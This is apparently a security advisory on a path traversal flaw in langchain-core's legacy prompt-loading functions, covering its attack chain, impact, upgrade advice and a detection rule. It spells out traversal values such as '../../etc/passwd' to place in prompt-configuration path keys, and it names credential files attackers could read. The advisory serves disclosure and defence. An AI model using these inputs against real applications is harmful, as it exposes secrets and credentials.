LangChain Core Path Traversal Vulnerability in Legacy APIs
A path traversal vulnerability in LangChain Core's legacy `load_prompt` functions allows attackers to read arbitrary files by injecting malicious paths into prompt configurations.
Multiple path traversal vulnerabilities have been identified within the langchain-core package, specifically affecting the legacy load_prompt, load_prompt_from_config, and .save() methods. These vulnerabilities stem from a lack of validation on file paths embedded within deserialized configuration dictionaries. An attacker who can influence or control the prompt configuration supplied to these functions can exploit this flaw to read arbitrary files on the host filesystem. The scope is constrained by file extension checks, limiting readable files to .txt for templates and .json or .yaml for examples. This issue impacts applications that accept prompt configurations from untrusted sources, such as low-code AI builders and API wrappers exposing load_prompt_from_config(). The vulnerable code resides within langchain_core/prompts/loading.py in the _load_template(), _load_examples(), and _load_few_shot_prompt() functions. This vulnerability is resolved in langchain-core version 1.2.22, and the affected functions are now deprecated.
Attack Chain
- Attacker identifies an application using the vulnerable
langchain-corelibrary and the legacyload_prompt_from_config()function. - Attacker crafts a malicious prompt configuration dictionary containing a
template_path,suffix_path,prefix_path,examples, orexample_prompt_pathkey with a path traversal sequence (e.g.,../../etc/passwd) or an absolute path (e.g.,/etc/passwd). - The attacker injects the malicious configuration into the application, potentially via a low-code AI builder or an API endpoint that accepts prompt configurations.
- The application deserializes the malicious configuration dictionary and passes it to
load_prompt_from_config(). load_prompt_from_config()calls the relevant vulnerable function (_load_template(),_load_examples(), or_load_few_shot_prompt()) based on the configuration.- The vulnerable function reads the file specified in the malicious path without proper validation.
- The contents of the file are then incorporated into a prompt object.
- The application, believing the prompt is benign, processes it further, potentially disclosing the file contents to the attacker via an error message, logging, or other output channels.
Impact
Successful exploitation allows an attacker to read arbitrary files on the system, potentially exposing sensitive information. This includes cloud-mounted secrets (e.g., /mnt/secrets/api_key.txt), configuration files (e.g., requirements.txt), cloud credentials (e.g., ~/.docker/config.json), Kubernetes manifests, CI/CD configurations, and application settings. The impact is especially severe in applications that handle sensitive data or operate in cloud environments. While no victim numbers are available, any application using the vulnerable langchain-core versions is at risk.
Recommendation
- Upgrade
langchain-coreto version 1.2.22 or later to patch CVE-2026-34070. - Migrate away from the deprecated
load_prompt,load_prompt_from_config, and.save()methods in favor of thedumpd/dumps/load/loadsserialization APIs inlangchain_core.load. - If you cannot immediately upgrade, sanitize user-supplied prompt configurations to prevent path traversal by rejecting absolute paths and paths containing
..sequences. - Deploy the Sigma rule “LangChain Path Traversal Attempt” to detect attempts to exploit this vulnerability by monitoring process creations involving
pythonand path traversal sequences in command line arguments.
Detection coverage 1
LangChain Path Traversal Attempt
highDetects potential path traversal attempts in LangChain applications by monitoring process creations with 'python' and path traversal sequences in the command line.
Detection queries are kept inside the platform. Get full rules →